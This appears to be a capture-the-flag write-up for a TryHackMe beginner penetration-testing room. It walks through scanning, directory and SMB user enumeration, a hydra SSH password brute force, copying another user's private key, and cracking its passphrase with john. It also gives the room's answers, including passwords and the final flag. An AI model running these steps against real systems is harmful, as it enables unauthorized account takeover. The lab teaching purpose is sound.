URL : https://tryhackme.com/room/basicpentestingjt
- Target IP :
10.10.165.235
Scanning
nmap -A 10.10.165.235
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 04:40 EDT
Nmap scan report for 10.10.165.235
Host is up (0.27s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2021-07-24T04:41:05-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-24T08:41:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.95 seconds
- The open port is
- 22 SSH
- 80 HTTP
- Apache/2.4.18 : no vulnerability
- 139、445 SMB
- Samba smbd 4.3.11-Ubuntu : no vulnerability
- 8009 AJP13
- 8080 Tomcat
Access Website (80 port)
- Use dirsearch
python3 dirsearch.py -u http://10.10.165.235/ -e all
- Question1 : What is the name of the hidden directory on the web server(enter name without /)?
- development
- After access the development page, we can get 2 files
- They are some mail from J and K to talk about some upgrade smb issue.
Try to find the username
enum4linux 10.10.165.235 -a
- So there are 2 username we find
kayandjan
- Although the verison of SSH services is 7.2p2, it has a vulnerability with Username Enumeration
- https://www.exploit-db.com/exploits/40136
- But I have tried and it doesn’t work
What is the password?
- We need to burp force the password for these 2 users
- Use hydra to check with rockyou.txt
hydra -l kay -P /opt/rockyou.txt ssh://10.10.165.235hydra -l jan -P /opt/rockyou.txt ssh://10.10.165.235
- We find the password :
armandowith userjan
Login into ssh services with jan’s credential
ssh jan@10.10.165.235- We are login with jan, but we can’t cat
/home/kay/pass.bak - And then we find some cool things at `/home/kay/.ssh‵
- This is the login key file he/she forgot to remove, so we can login with ssh without password, we can try to scp it to our computer by
scp -r jan@10.10.165.235:/home/kay/.ssh .
- Use ssh command to try to login with kay
chmod 600 id_rsassh kay@10.10.165.235 -i id_rsa
- But the key file needs password, so we need to crak
Crack ssh key
- Use ssh2john
python ssh2john.py id_rsa > john_ssh- Run john with wordlist rockyou
john john_ssh --wordlist=/opt/rockyou.txt
- So password is
beeswax
Use key file and password to login with ssh
- And we can find the final flag!
heresareallystrongpasswordthatfollowsthepasswordpolicy
Final Screenshot
